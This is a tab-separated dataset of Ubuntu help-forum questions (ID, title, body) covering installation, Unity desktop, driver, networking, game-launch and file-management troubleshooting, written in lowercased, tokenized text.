34699	does not install to hard drive on an msi wind	i 'm running ubuntu from a pendrive . when install to hard drive is selected from the first screen after booting from the pendrive the process stops before the partitioning drive page appears . i have a msi wind with recently restored windows xp .
34702	how do i set up android adb ?	my computer is a sys76 lemur running maverick , and my phone is a nexus s running stock gingerbread . i want to set up to use adb ( android debug bridge ) . i installed the android sdk per instructions on the sdk website , but adb does n't work . can someone help me with directions that are specific to ubuntu ?
34704	how do i figure out what package something is in without resorting to google ?	i often find myself wanting to install something , but i 'm unsure of what package it 's in . this is a very common occurrence for me : $ make html sphinx-build -b djangohtml -d _build/doctrees . _build/html make : sphinx-build : command not found make : *** [ html ] error 127 $ sudo apt-get install sphinx e : unable to locate package sphinx $ sudo apt-get install sphinx-build e : unable to locate package sphinx-build googles $ sudo apt-get install python-sphinx is there a better way ?
34707	recovering from messed up binfmts configuration	all i 'm trying to do is getting a manually installed mono ( to /opt/mono-2.10 ) to run cli executables without having to specify the interpreter explicitly . wine is not installed . ubuntu 10.10 . no mono package is currently installed ( dpkg -l | grep mono gives nothing ) , but they were in the past before i realized that i need a much newer one , so that 's probably the source of this mess . running a cli executable gives me this : ca n't exec `` /usr/lib/cli/binfmt-detector-cli '' : no such file or directory at /usr/share/binfmt-support/run-detectors line 92 . that is correct , /usr/lib/cli/binfmt-detector-cli does not exist and i do n't know where it should have come from . so i googled a bit and found some information about the binfmt_misc module . indeed , it is loaded and i have a /proc/sys/fs/binfmt_misc/cli which contains this : enabled interpreter /usr/share/binfmt-support/run-detectors flags : offset 0 magic 4d5a this run-detectors script is perl , but apparently does n't work ( this is probably debian # 575776 ) : user @ host : / $ /usr/share/binfmt-support/run-detectors use of uninitialized value in open at /usr/share/binfmt-support/run-detectors line 56 . use of uninitialized value $ argv [ 0 ] in concatenation ( . ) or string at /usr/share/binfmt-support/run-detectors line 56. run-detectors : unable to open : no such file or directory but anyway , i do n't have wine , so i do n't need all that binfmt-detector-cli stuff in the first place . i just want those binaries to be hard linked with the mono interpreter . i found this answer on su and this blog entry , which discuss how to change these rules . unfortunately , trying that , i always get a 'permission denied ' : user @ host : / $ sudo echo . : clr : m : :mz : :/opt/mono-2.10/bin/mono : . > /proc/sys/fs/binfmt_misc/register bash : /proc/sys/fs/binfmt_misc/register : permission denied user @ host : / $ sudo echo -1 > /proc/sys/fs/binfmt_misc/cli bash : /proc/sys/fs/binfmt_misc/cli : permission denied i found /usr/share/binfmts/cli and changed it to package mono-runtime interpreter /opt/mono-2.10/bin/mono magic mz but that seems to have no effect . then there is /var/lib/binfmts/cli , which i changed to mono-runtime magic 0 mz /opt/mono-2.10/bin/mono but that also has no effect . i also found the script update-binfmts but i ca n't get it to work . i do n't even manage to remove an existing configuration . the following attempt for example leaves me with a rather cryptic error message : user @ host : / $ sudo update-binfmts -- remove cli /opt/mono-2.10/bin/mono update-binfmts : warning : current package is < local > , but binary format already installed by mono-runtime ; not removing . i have no idea whether my arguments were valid ( the help page mentions < path > but does n't say the path to what it wants ... or why ) , whether the second line is supposed to be an error message and whether it changed anything in the first place . how do i make any executable that starts with the magic string 'mz ' to be run with /opt/mono-2.10/bin/mono ? update 1 : the outputs to the commands colin suggested : user @ host : / $ sudo update-binfmts -- package mono-runtime -- remove cli /opt/mono-2.10/bin/mono update-binfmts : warning : current package is mono-runtime , but binary format already installed by mono-runtime ; not removing . user @ host : / $ dpkg -s /usr/share/binfmts/cli dpkg : /usr/share/binfmts/cli not found . user @ host : / $ sudo rm /usr/share/binfmts/cli* user @ host : / $ sudo update-binfmts -- install cli /opt/mono-2.10/bin/mono -- magic mz update-binfmts : warning : current package is < local > , but binary format already installed by mono-runtime update-binfmts : exiting due to previous errors
34712	wget server issues or the command is wrong ?	i have a file on my server that is changing constantly , it changes hourly , sometimes it changes every minute . the file is is growing , but not so fast . this file is generated inside a dir called /home/my_user/backup123/subnets.cfg , until here no problem . this is my first question : now i need to put this file on a remote server . what is the best way to do this ? from my local server , that where the file is located or across the remote server ? here is my second question : if i do across the remote server i think i need to use the wget command right ? i have tried to use this command : wget -- user=my-user -- password=password http : //example.com/dir/subnets.cfg but it is not working , it tells me `` wrong user name '' . of course i had use my own user name and password , but it is not working . i have permissions to the file and dir . i need to get the subnets.cfg file and put it on my remote server , how can i do that ?
34713	garbage on rotated screen when i rotate a certain monitor	i have a really weird problem with ubuntu natty : i have 2 monitors ( dell 2407wfp and dell 2007wfp ) connected via dvi to a ati x1600 graphics card . everything works well in normal configuration , but when i rotate the 2007wfp it displays only garbage ( i can see the cursor like normal trough ) . funny thing is when i rotate the 2407wfp or both , everything is normal . i 've tried to swap the connectors on the graphics card but that did n't change anything . i am using the open source ati driver .
34717	will the software center offer an option to donate ?	will the software center offer an option to donate to the developer/s of a particular application ?
34718	what shall i do with the 2nd partition ?	when installing ubuntu , i have divided my hard disk into two partitions . ( based on experience with windows ) the main is 10gb and the other one is 65 gb huge . now i am running out of space ( about 4 gb left on main disk ) . after googling , i understood that there is no chance to change the default installation directory to another partition . could you suggest me what to do , because i have unused space on the whole 2nd partition ( 65 gb ) ? thanks !
34725	how to download files from ubuntuone to windows	while i 've been working with ubuntu , i used ubuntu one to backup my critical files . i did n't store files in the folder ubuntu one , i marked my folder documents to sync . well now on website i can see all my files , but i do n't know how download all of them to my pc with win 7 installed . i installed the beta client ubuntu one for windows , but i do n't know what else i can do , except downloading each file manually .
34727	can gedit or gvim copy multiple seperate lines to the clipboard ( maybe by using bookmarks , or a script or another editor )	i want to copy many `` selected '' full lines to the clipboard ... the lines are typically seperated from each other in the file ... is either gedit or gvim capable of this ? ... what i would prefer is to only need press a single key to mark a line ( like f2 .. but i think that vim would need more keystrokes : ( ... the next step i envisage , is another key ( combo ) to copy all the `` selected '' lines to the clipboard ... i 'm open to other suggestions of how to do this ; maybe there is some `` block-mode '' .. but i do want it to be fast to select each line ( must be a full line including the trailing newline ) ... . i 've mentioned gedit and gvim as they are the most commonly used ubuntu editors ( i think ) ... but maybe another editor does this exact thing ... maybe just appending to the clipboard will work . but that really is a last resort ! as it is big-time error-prone ... btw , i do n't know the key-combo for appending to the clipboard , so i 'd like to know about this too.. , thanks ps . i 've tried gedit 's advanced-bookmarks plugin , but it does n't seem to do what i want ... . notepad++ has this copy-all-bookmarked-lines feature , but although it is open-source ( based on scite ) , it only runs under wine and shows a few bugs in that environment ... . but i 'd really like a native linux text editor for this ..
34731	howto auto-mount windows-partitions using /etc/fstab	hello what do i have to write in the file `` /etc/fstab '' to get my windows-partition ( /dev/sda3 ) automatically mounted on startup ? i get this error-message ( clicking on the bookmark for the partition in nautilus ) : error mounting : mount exited with exit code 1 : helper failed with : unprivileged user can not mount ntfs block devices using the external fuse library . either mount the volume as root , or rebuild ntfs-3g with integrated fuse support and make it setuid root . please see more information at http : //ntfs-3g.org/support.html # unprivileged my fstab looks like this : > # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/sdb6 / ext4 errors=remount-ro 0 1 /dev/sda3 /media/jonas ntfs rw , auto , users , nls=utf8 , umask=007 , gid=46 0 0 # swap was on /dev/sdb7 during installation uuid=9dcdfad2-4e66-416e-bf68-142afe23fa0b none swap sw 0 0 i created the folder /media/jonas and the partition is /dev/sda3 . what did i wrong ? solution : after rebooting , it worked well . strange .
34733	keyboard shortcut to respond to notification ?	i am wondering if there is a keyboard shortcut to respond to a notification . e.g . you get a notification that a chat messages has been recevied . press ? ? ? and it will open the chat window . same sort of thing with email , wifi connected etc .
34734	how to use ~/.xcompose in qt/kde apps	i installed a very nice ~/.xcompose file ( which i found on github ) . however , kde apps at least do not use it unless i manually select xim input mode on all the widgets . is there a way to specify this globally ? or at least to get it in konsole ?
34737	uploading or attaching files that located on a shared drive does n't work ?	i have this odd , quite minor , but annoying issue that i am quite perplexed about . whenever i try to upload a file via my browser ( let 's say attach a file to an email in gmail ) , i click 'browse ' button and it opens standard file selection dialog , that does n't show network drives . further more if i try to drag a file from a network drive into gmail , it does n't work either , it just does n't let me do that . this issue has been around for quite sometime now , and i am just curious if this is something on my side or if it 's a bug or a misconfiguration of some sort . fwiw , i am currently running 10.10 , network drive is a samba share on nas . this happens in ff and chrome and this is only happens with samba mounts . as a matter of fact , nfs volumes that are located on the same network operate perfectly fine .
34738	how can i ungroup applications separately in unity launcher ?	unity is pretty cool . one of main feature i like with unity is access running apps with handy winkey . however one issue is annoying me with grouping of apps without tray feature . i 'm running more than 2 wine apps [ wine-app1 , wine-app2 , wine-app3 ] . all of them appears in unity application placer under one icon . pressing winkey ( hold it for 1 sec ) shows up the number and pressing corresponding number takes to a particular application . this is the difference with alt+tab . in alt+tab you walk through all application windows and select the one you wanted . however , you walk through rest as well which you do n't need . in my working environment , i use few editors and few windows apps due to company it . since all windows apps are grouped as one , everytime when i wanted to access wine-app1 , wine-app2 , the wine-app3 appears in walk through . [ this is something similar to win+w - show all windows in a tiles fashion ] i access wine-app1 & 2 frequently and very very occasionally use the wine-app3 . but , it should be running in the background so that i can access when its needed . what i 'm looking for a way to pin the apps with a number . so that , i can access quickly . if i want to access wine-app1 and wine-app2 , i had to pass wine-app3 and minimize wine-app3 everytime ( since it appears using win key ) i access other two apps using winkey . is there way , we can let unity to treat these apps separate one though these are wine based apps . it should n't even group . and i can give new icons and access in separate .
34742	how do i get a d-link dwa-140 usb wlan working ?	i just installed natty beta 1 and my d-link dwa-140b2 usb wlan dongle does n't work any more . any ideas for how to fix it ? this is what i get in syslog apr 12 20:00:16 agda kernel : [ 118.779178 ] ieee80211 phy2 : selected rate control algorithm 'minstrel_ht' apr 12 20:00:16 agda kernel : [ 118.786483 ] registered led device : rt2800usb-phy2 : :radio apr 12 20:00:16 agda kernel : [ 118.786572 ] registered led device : rt2800usb-phy2 : :assoc apr 12 20:00:16 agda kernel : [ 118.786658 ] registered led device : rt2800usb-phy2 : :quality apr 12 20:00:16 agda networkmanager [ 712 ] : < info > found wifi radio killswitch rfkill2 ( at /sys/devices/pci0000:00/0000:00:1d.7/usb1/1-3/1-3:1.0/ieee80211/phy2/rfkill2 ) ( driver < unknown > ) apr 12 20:00:16 agda networkmanager [ 712 ] : < info > ( wlan0 ) : driver supports ssid scans ( scan_capa 0x01 ) . apr 12 20:00:16 agda networkmanager [ 712 ] : < info > ( wlan0 ) : new 802.11 wifi device ( driver : 'rt2800usb ' ifindex : 5 ) apr 12 20:00:16 agda networkmanager [ 712 ] : < info > ( wlan0 ) : exported as /org/freedesktop/networkmanager/devices/3 apr 12 20:00:16 agda networkmanager [ 712 ] : < info > ( wlan0 ) : now managed apr 12 20:00:16 agda networkmanager [ 712 ] : < info > ( wlan0 ) : device state change : 1 - > 2 ( reason 2 ) apr 12 20:00:16 agda networkmanager [ 712 ] : < info > ( wlan0 ) : bringing up device . apr 12 20:00:16 agda networkmanager [ 712 ] : < warn > ( wlan0 ) : firmware may be missing . apr 12 20:00:16 agda networkmanager [ 712 ] : < info > ( wlan0 ) : deactivating device ( reason : 2 ) . apr 12 20:00:16 agda networkmanager [ 712 ] : scplugin-ifupdown : devices added ( path : /sys/devices/pci0000:00/0000:00:1d.7/usb1/1-3/1-3:1.0/net/wlan0 , iface : wlan0 ) apr 12 20:00:16 agda networkmanager [ 712 ] : scplugin-ifupdown : device added ( path : /sys/devices/pci0000:00/0000:00:1d.7/usb1/1-3/1-3:1.0/net/wlan0 , iface : wlan0 ) : no ifupdown configuration found . apr 12 20:00:16 agda kernel : [ 118.896657 ] phy2 - > rt2x00lib_request_firmware : error - current firmware does not support detected chipset
34750	how to install gnome 3 without breaking unity ?	i tried installing gnome 3 from the ppa , but it broke unity and i had to reinstall natty from scratch . does anyone know if there is a way to install gnome 3 without breaking unity ?
34753	can not log into ssh unless logged in locally	i just set up pubkey authentication on my server ( running ubuntu server 10.10 ) . if i am logged in to the server locally ( at the box ) , then i can ssh into the server fine ( from another machine ) . if i am not , however , i can not login and just receive the error `` permission denied ( publickey ) '' . if i run the ssh command with the verbose flag , this is the output : http : //pastebin.com/3bpate1u i do not have this issue if i do n't use pubkey authentication and just use password-based , but pubkey is the method i would like to use . any help ?
34759	moving large data between ubuntu systems in a home network	i have two computers in my home network linked with a router with each other , i use to transfer small files using sftp but the transfer rate is very slow . now i want to move around 100gb of data from my laptop to the other computer in network . what would be the ideal way of transferring the data in a reasonably fast speed compared to sftp ?
34767	installing java on computers with no internet connection ?	i have a network of 20 computers ( all running ubuntu 10.04 lts ) , connected together in a network . most of the machines are placed in places that are really hard to get to . i have a central machine from which i can freely ssh to all other machines . this central machine is the only one that is connected to the internet . i now have a need to install java 1.6 on all the 'remote ' machines ( those that are not connected to the internet ) . would it be possible to do so by accessing them from within the 'central ' machine , and providing them with the java 1.6 installation files ( or in some other way ? ) how do i go about it ?
34768	where is `` connect to server '' for ssh connections in unity ?	can not find `` connect to server '' in 11.04 , looks like unity does n't have it . is there other very similar way to connect to another ubuntu computer via ssh ? ( not in terminal )
34773	how to add a button on unity panel ( from nautilus 's bookmarks ) ?	is there a way to make a launcher ( icon ) on unity panel from nautilus 's bookmarks or it is for programs only ? thanks
34774	humble frozenbyte bundle - error when installing .run file	i just bought and downloaded the most recent humble indie bundle , and i downloaded a .run file for one of the games . i set the file to executable with chmod +x trine.64.run and then tried installing it with sh trine.64.run i am getting the following error : trine.64.run : 1 : syntax error : `` ( `` unexpected i 'm on 11.04 64 bit
34779	how do i allow regular users to install printers ?	i 'm configuring a 10.10 machine for deployment in an organization with likewise open and active directory , and i need to know if ubuntu can allow users to install printers automatically . i tested and it seemed that domain users have to manually enter their credentials to access a shared printer but also need root in order to install it . is there a way around needing root to install printers ?
34780	dell laptop with ubuntu preinstalled in india	i am in india and want to buy a dell laptop with ubuntu but on dell site they dont have an option for ubuntu as an operating system . are there no ubuntu laptops available for users in india ?
34782	full-screen problems with libreoffice/unity	i use a netbook ( asus eeepc 1005ha ) . often i work full screen in libreoffice writer . i 've noticed that when operating in a maximized window , unity locks up and sometimes freezes both programs . additionally , the alt+tab command does n't display the libre office instance when it is maximized . this problem does n't occur when the screen is in a window form . any thoughts ?
34783	what would cause 'ping localhost ' to fail ?	the /etc/hosts file contains a line : 127.0.0.1 localhost so localhost should be a valid hostname , but any attempt to connect to a port on localhost fails , including ping . connection attempts into this server from outside , using the same clients , work . connection attempts from this server to other servers using these clients also work . on further investigation , it also fails to ping the loopback ip 127.0.0.1 when ping is invoked directly on that ip . in addition to pinging , i tested with 'socat tcp4.. ' . would a bad iptables prevent a localhost connection ?
34788	mouse and keyboard do n't work on an inspiron 2650 after installation	i just downloaded ubuntu 10.10 to an older laptop ( inspiron 2650-pentium 4 ) using the windows installer ( windows xp is the other os ) . everything seemed to be working fine but when the computer updated and asked me to restart , neither the keyboard or the mouse would work . there seem to be a lot of people who have experienced this problem . which fix is the easiest to do since i 'm not very computer savy . and also , i do n't know what it means when the instructions for a fix , say to open a terminal , and run some code . is there some documentation or a website where i could find out how to do this to run the fix . please help -- this is driving me crazy .
34795	no launcher in unity ?	i 'm testing natty on a dedicated test machine . i 've not used nor seen unity before this except in screenshots , but i understand that one of the main elements of the unity ui is a dock . well , for some reason there is no dock on this machine . the global menu is there , and the ubuntu button and such like , so i 'm satisfied that unity is running ( i also verified this by trying to run it from a terminal . ) i 'd appreciate any ideas as to why the dock never showed up and how i can install or activate it manually . here 's a screenshot with unity desktop ( `` ubuntu '' option in login menu ) : here 's a screenshot with gnome desktop ( `` ubuntu classic '' option in login menu ) : as you can see , it 's somewhat difficult to tell by looking which one is running . imo since both desktops ship with natty and neither one of them is 100 % bug-free , there ought to be an easy way to tell them apart . as it is , they can be distinguished by the slightly different appearance of the upper banner and lower banner . for example , in `` ubuntu classic '' the ubuntu button at upper-left corner of the screen is in larger and colored orange and yellow .
34796	how do i enable the libreoffice quickstarter in unity ?	i would like to get my quickstarter to show in unity , or replace it with an indicator . is this possible ? . i tried unity 2d , and to my shock , it works there , but refuses to work in unity proper .
34798	wifi - does not connect because of different mac 's	in my university i have one wi-fi network . if i need to access the internet i access it with peap-authentication . now the issue - all wifi-spots have the same name ( ssid : wlan1 ) and ubuntu sometimes refuses to connect . what i saw is , that in syslog wpa_ ( dontknowanymore ) says trying to connect with ( mac1 ) and the wifi is associated with another mac . how can i fix this , so i can force my ubuntu to reassociate ? regards ,
34800	mouse theme does n't work all the time	the mouse theme shows up in the web browser and software center , as well as the update manger . however , it goes to defaults on the desktop . can it be fixed ? i am using the azenis mouse theme , with natty beta 1. got swich to natty beta 2 and still the problem
34802	convert my physical operating system to a virtualbox disk	is it possible to convert a physical ubuntu install ( intel based pc with ubuntu 10.10 ) to a virtual box disk , so that i can use that same environment on a separate pc or can keep it virtual for testing ? something similar to `` disk2vhd '' which converts a physical windows 2k3 and above box into a vhd or vmware image . will be grateful for your assistance ! kind regards
34803	how to remove change desktop background from right click ?	i want to restrict users on changing wallpapers and themes . so can anyone say me how to remove change desktop background option from right click ? note : i just totally want to remove that option from right click .
34805	is there an equivalent of silverlight ?	i need silverlight installed on my ubuntu system , so that i can see some of the microsoft websites ( mainly videos ) . are there any alternatives to silverlight in ubuntu ? if so , what are they and how do i install them ?
34809	will gnome3 installation affects unity ?	gnome3 is out in the market and there has been a lot of talk about it . i like unity interface very much . however , i was thinking to try out gnome3 as well . but , wanted to be careful . i 've already setup unity and i do n't want to mess up . is installing gnome3 will affect unity desktop by chance ? .
34813	daily ( open source ) bible devotional guide software	just as the title says are there any apps for my daily devotions .
34817	how to copy files to multiple hosts across the network ?	i have more than 200 ubuntu systems to which i want to copy a file . how can i copy files to multiple hosts across the network ? what possibilities do i have ? note : this question is related to how to find the version of an ubuntu machine remotely ?
34819	only a few internet pages will load	okay , i just installed ubuntu 10.10 on my hp 2140 . for some reason it will only display some webpages ( google and reddit work ) . it will download and install updates and applications fine , but does n't display most pages ... can anyone help ?
34825	will upgrading to 11.04 destroy my current desktop settings ?	i 've had problems the last few upgrades . things have been added to ubuntu that i do n't particularly care for . window buttons have moved , indicator applets have sprung up , menu icons have vanished and each upgrade i 've found myself having to `` fix '' things to get them back to how they were . i 'm not going to get bogged down in whether my opinion is `` correct '' or otherwise , just that i 'd like to stay the same . the upgrade to 11.04 poses major issues for me where all of the following statements are true : i like new versions of packages i 'd like to be on the current version of ubuntu to help people with that version i 'm too busy to spend hours recovering my panel-based desktop configuration i have no desire to try unity now . i may want to in the future , but not today , thank you . my understanding is that the default upgrade would dump me in a unity environment regardless of my previous desktop settings . i 'm aware of the classic mode . my understanding is it 's currently a completely new configuration of panels made to look more like unity . i realise i could battle it to the death to get my current theme/panel-settings/pannel-applets back , but unless it just defaults to my current desktop , i 'm not very interested in it . i 'd rather not upgrade . so the question is : can i upgrade to natty without destroying my desktop ? is there a clean upgrade path for users ( for example ) who have hundreds of users they ca n't afford to retrain right now ? or are we stuck on maverick for the foreseeable future ? edit : i guess to clarify a sub-questions would be : what does classic mode show when you do an upgrade ? the old , previously configured desktop or a new stock configuration ? i might have to test this in a vm to see what happens but it 's a lot of bandwidth to spend on an experiment . edit i upgraded today . took me to unity , i logged out and into classic ( as expected ) . most of the settings appear in tact , compiz has a whole load of new defaults and lost settings ( fair enough ) , most of my panel applets ( window lists , clock , notification area ) are n't loading . there will be a follow up question .
34827	why is linewise scrolling in vim in gnome-terminal jerky ?	i use vim in gnome-terminal and have noticed that when holding down j or k to scroll multiple lines , the drawing of the screen seems to have a bit of trouble keeping up . vim will scroll 1-2 lines , then there will be a very short delay ( probably measured in milliseconds ) but it still makes the scrolling seem very jerky . is there anything that can be done to prevent this . you would think in this millennium our computers would at least be able to display text smoothly .
34828	show time drift relative to a time server	i want to monitor the time drift on my workstation . how can i compare my local time to a timeserver like pool.ntp.org and show the difference ?
34830	how do i enable apt-get tab suggestions on my server ?	on my desktop typing python- and pressing tab offers suggestions of installable packages that are prefixed python . my server does n't have this ability , how can i fix that ?
34836	what is the preferred way of transfering a filesystem between two local hdd 's	i want to migrate an external usb hdd which i have been running ubuntu 10.04 lts for a while onto a laptop internal hdd . unfortunately the internal hdd is smaller than the external hdd so i can not transfer the partition using dd . but all the files on the external hdd will fit on the internal hdd so copying all files will work . after googling and reading this blog post and all its comments , it seems like rsync -h and cp -a are both good candidates , but i never really got a confirming answer which of those that was fastest , most reliable etc . rsync is good for other things as well but for a local filesystem transfer , cp would be the right choice , i mean this is unix so the basic commands should work .
34838	how to rename directories that are hard to type ?	how can i rename oddly named directories without typing their full names ? i 've got 8 folders with very long foldernames and i only got these folders in this path /home/user/downloads/ - is there any command to get every { *.txt } file from all folders and move them to another directory ?
34840	i s there an equivalent to the netspeed applet ?	i use the netspeed applet to monitor all my internet connections , in particular when using mobile broadband where it also gives a total of the transfers during the connection . i understand that there are no current plans to allow use of such indicator applets in natty with unity . are there any work-rounds for running applets or are there equivalent applications which will run under natty .
34843	alt+tab out of fullscreen game	right now i 'm running trine , which is a game using opengl running in fullscreen , in ubuntu 10.10 . what i would like to be able to do is alt+tab out of the game to be able to browse the web , check any im messages , etc . while paused . however , just alt+tab'ing does n't do anything , so i have to quit the game every time i want to check something . is there any way that i can minimize a fullscreen game ? i know i can probably run it in windowed mode , but then i would have to hide the panels when playing - since the game would otherwise be hidden underneath . plus , that 's just an ugly solution .
34844	humble bundle game 'trine ' not working	i downloaded the game trine from the humble frozenbyte bundle and installed it on ubuntu 10.10 but for some reason it fails to launch . i downloaded the trine.32.run file and made it executable and then double clicked it and a installation dialogue opened and the game seemed to install properly , i got game launcher on desktop and application menu but when i click on the game launcher , a window opens and when i click on launch nothing happens . here is the error i get when i lanch it from command line by going into the installation directory ... gaurav @ gaurav-hcl-me-laptop : ~/trine $ ./trine-launcher32 ./trine-launcher32 : ./lib32/libxml2.so.2 : no version information available ( required by /usr/lib/libglade-2.0.so.0 ) got signal 11 at ( nil ) from ( nil ) ./trine-bin32 [ 0x8078188 ] [ 0x7e040c ] aborted this very same issue occurs on two of my computers . update : now when i launch the game a message pops up saying error compiling shaders . make sure your gpu supports shader model 3.0 . additional details may be found in the log . here is what game log in ~/.frozenbyte/trine/logs/log.txt states ... 14.1.2010 [ 2:01 ] info : vertex profile : arbvp1 info : vertex shader options : info : numtemps=32 info : maxinstructions=4096 info : maxaddressregs=1 info : maxlocalparams=1024 info : pixel profile : arbfp1 info : pixel shader options : info : arb_draw_buffers info : numtemps=256 info : numinstructionslots=16384 info : numtexinstructionslots=16384 info : nummathinstructionslots=16384 info : maxtexindirections=16384 info : maxlocalparams=1024 info : maxdrawbuffers=4 error : cg error : 4 4 ( the program could not load . ) error : cg error : 4 4 ( the program could not load . ) error : cg error : 4 4 ( the program could not load . ) error : cg error : 4 4 ( the program could not load . ) error : cg error : 4 4 ( the program could not load . ) error : cg error : 4 4 ( the program could not load . ) error : cg error : 4 4 ( the program could not load . ) error : cg error : 4 4 ( the program could not load . ) ps : i contacted the humble bundle support but they did n't have any clue about the issue , so my only hope is to get some help from ubuntu community .
34845	how do i start a script at login ?	how do you run a script when a user logs in ? i have created a script script.sh and used chmod +x to make it executable where would i place the script to make it startup when a user logs in .
34855	no sound in shadow-grounds survivor ? ( 64bit )	i start the game and there is no sound . what shoudl i do ?
34864	alternative software to freeping ?	is there any alternative software to freeping in ubuntu ? note : freeping automatically pings in the background and shows statistics for each pinged hosts . when a host stops responding , freeping can send popup messages to a specified destination .
34868	how do i back up via ftp and rsync ?	i am new to these backup things . i have try backuppc and rsnashot . backuppc was cool , with web frontend . my probleam : i do n't have any backup servers i just have server and ftp-disk . i wanted to backup my server to ftp-disk , but i 'm not sure how to do it ? can i use rsync ?
34873	how to avoid mysqld to start on boot	in my laptop i have installed a lamp environment for developing php apps . i would like to prevent these services ( apache , mysql , .. ) starting on boot . for apache is pretty simple to avoid it : sudo update-rc.d -f apache2 remove but for mysqld i could n't find a way to do the same . i have googled it for a couple of days trying to get a solution for this but i did n't found it . cheers .
34875	hp dv7 ethernet intermittent flashes	i have an hp dv7 laptop with ubuntu 10.10 installed when i plug the cable no connection is established and a white light starts to flashes intermittent , the system tells me that no connection is active i tried to reinstall the os but nothing works . any idea ?
34880	use of /opt and /usr/local directories in the context of a pc	what is the difference between /opt and /usr/local directories and what kind of programs should be installed to them ? i referred to linux file-system hierarchy but the explanation is not that clear . according to above link ; /opt : - this directory is reserved for all the software and add-on packages that are not part of the default installation /usr/local : - the /usr/local hierarchy is for use by the system administrator when installing software locally . it needs to be safe from being overwritten when the system software is updated . in the context of a pc without any networked computers what should be the directory to install a software that will be accessed by multiple local users ? ( i.e . where should i install a software like netbeans ) thank you
34882	2d story maker ?	i wonder if there is a software that enable you to easily build characters and make a story in 2d ( without even drawing or rigging them ) . for instance , that provides you a complete character , like a doll , which can have different positions . any suggestions ?
34883	how do i make a smart playlist of my purchased music ?	i buy from both 7digital and amazon mp3 stores , how can i make a smart playlist of all my purchased songs ?
34885	cufon fonts in chrome very grainy	when using chrome on ubuntu , anything that uses cufon is causing the fonts to become very grainy . i have the same version of chrome on windows and i do not have this problem , it is only on ubuntu . i have attached an image below to show an example of what i mean . this happens on any webpage that i go to using cufon . i can open the same page in firefox and it looks fine . i 'm at a loss on this one . update i have installed ubuntu in a vm , installed the same version of chrome , and all is well . so this appears to only be happening on my computer , not on ubuntu/chrome as a whole . possible helful information : ubuntu version : 10.10 chrome version : 11.0.696.34 beta all extensions have been disabled
34886	unity.desktop xession file	i 'm missing my unity.desktop xsession file . can someone plese help me by posting their so i can se how it should look like ? bonus question : how does it get installed in the first place ? dpkg -l unity | grep desktop does not reveal any *.desktop files .
34888	is there any way to roll back the most recent upgrade ?	this has happened to me many times in the last 5 years : an upgrade broke my system . each time i end up with this situation , i have to reinstall the whole system , which is really annoying . is there any way to roll back the most recent upgrade to be able to have a functional system without reinstalling ? if not , which is the best way to suggest this as a top priority idea ? i read this idea was described in brainstorm.ubuntu.com , but it feels it is dead ... and the forums are full of examples of upgrades breaking things , that 's why i feel something needs to be done about this topic . thanks !
34889	where do i find the google talk plugin once it is installed ?	when i try to download google video chat plugin , it tells me that my country is restricted from using their services , however i manage to do it using some software . where is it installed in my computer so that when i do a clean install of ubuntu 's new version i just copy that to my new install ?
34890	is there a way to add a window list on the panel in unity ?	is there a way in natty with the unity shell to add a window list ( or , even better , something like talika ) to the top bar ? or , failing that , some sort of appindicator for open windows ? ultimately , i 'd like to replace the current global menu with a separate window list and a global menu that only shows the menu and never the window title , which i find distracting and duplicative . that does n't seem to be an option at this stage so i 'm setting my sights on just adding a window list that allows me to see what i have open without any mouse or keyboard actions .
34896	only record while i am moving the mouse or typing	i 'd like to have the resulting video as small as possible . so it should only record when i type or move mouse . when i 'm idle , it should not record .
34902	search results in unity are always empty	this is a bit similar to unity file lens giving useless or no results but worse - i have a relatively clean install of 11.04 , upgraded from 10.10 , and i do n't seem to have any lenses at all , only `` shortcuts '' ; and i never ever get any results , regardless of what i type in the dash search box . yet zeitgeist is installed ok and works as evidenced by the activity journal .
34904	error when installing patched unity launcher	i 'm getting the following error when i try to install `` unity-df '' , which is a patched launcher for unity that allows you to further customize the launcher . error : breaks existing package 'unity ' that conflict : 'netbook-launcher ' . but the '/home/alex/unity-df_0.2.47-0ubuntu5_amd64.deb ' provides it via : 'indicator-renderer , netbook-launcher' '' unity-df '' links 32 bit 64 bit source is this an outdated package , or is it for the maverick version of unity ? and does anyone know who the author of this package is ?
34909	is it possible to search among content of documents ?	i was wondering if it is possible to search among content of documents possibly of various types : pdf , djvu , html , text file , programming code script , ... possibly under various directories under each the documents are mixed together and possibly with other nondocument files ? is grep capable of doing these kinds of thing ? thanks and regards !
34913	what is the difference between unity-2d and unity-3d ?	what is the difference between unity-2d and unity-3d ? would unity-2d be supported ( updates , features ) in the future version of ubuntu ?
34923	ram usage for webadmin	i would like to know ram usage . i know there are several commands like free , top , but how can i get only the number in mb 's like `` 3172 '' , so i can use it in my webadmin script ? thanks in advance .
34925	organization of zoneinfo folder	my questions are related to /usr/share/zoneinfo folder . why is there a posix folder , which has the same content and files like zoneinfo ? i only checked few files and they had same checksum . why is there a right folder ? as far as i know are in there timezone files which contains time with no leap years , because every year has all the seconds . no one uses this anymore . why is there a etc directory ? in there are gmt+/-number files which , so i heard , does n't have daylight saving time . why is there a lot of time zone files like this est5edt , pst8pdt , cst6cdt , rok , roc , etc ? that does n't make any sense to me . any other information about this folder and files or general information about timezone files would be much appreciated .
34929	move pointer automatically to default button	that it . is there a way to configure mouse preferences to move the pointer automatically to the default button in ubuntu 10.10 ? regards
34932	where can i find the full list of compose combinations for my locale ?	after enabling my compose key , i want to find the list of all the key combinations i can use to create special characters . where is the full list that my system is using when parsing the keys typed after the compose key ? i know about things like ë ( e '' ) , ° ( oo ) , and ‽ ( ! ? ) , but there are surely many more . everything i 've found online seems out of date or incomplete . i would expect the full list to be locale-specific too .
34942	how to make fat32 partition mounted at startup ?	i run ubuntu 10.10 amd64 and want to ask for suggestion how to make fat32 partition mounted on startup or at login . i usually have to open nautilus and click on the partition to get it mounted . thanks .
34944	how do i install phpstorm ?	i am using ubuntu 11.04 . i have installed the jdk . i have now downloaded phpstorm which was a tar.gz . after extraction i have /bin /lib etc . i know i can run /bin/phpstorm.sh . but where am i meant to put the phpstorm folder ? what permissions do i need to set ?
34945	proper method of installing enigmail	what 's the proper way to install enigmail ( pgp signing for thunderbird ) ? i noticed that it 's in the ubuntu repositories - is that the proper way to install it , or should i install it from the page on the thunderbird addons site ? or does it not matter at all ?
34951	alt+tab-ing games ( like trine or aquaria )	does anyone have any idea how to do the equivalent of alt + tab , or to minimize games that take the mouse cursor ? i am using windowed mode .
